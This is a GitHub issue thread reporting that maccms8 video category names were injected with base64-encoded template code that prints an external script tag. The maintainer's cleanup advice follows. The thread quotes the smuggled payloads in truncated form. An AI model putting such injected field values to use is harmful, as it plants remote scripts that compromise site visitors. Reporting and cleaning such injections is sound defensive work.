### ISSUE TITLE
 分类被挂马

### ISSUE THREAD

**Issue by M-pub** [magicblack/maccms8#21]
1、电影{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44bj ok
2、连续剧{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok
3、综艺{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44bj ok
4、动漫{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44bj ok
5、动作片{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok
6、喜剧片{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok
7、爱情片{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok
8、科幻片{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok
9、恐怖片{if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hLm44b ok

**Comment by lvxiaying** [comment]
使用后台的挂马检测删不掉

**Comment by magicblack** [comment]
升级到1015，1后台数据库-》挂马检测（清理多次）；2 站点配置-》常用-》开启   数据安全过滤。
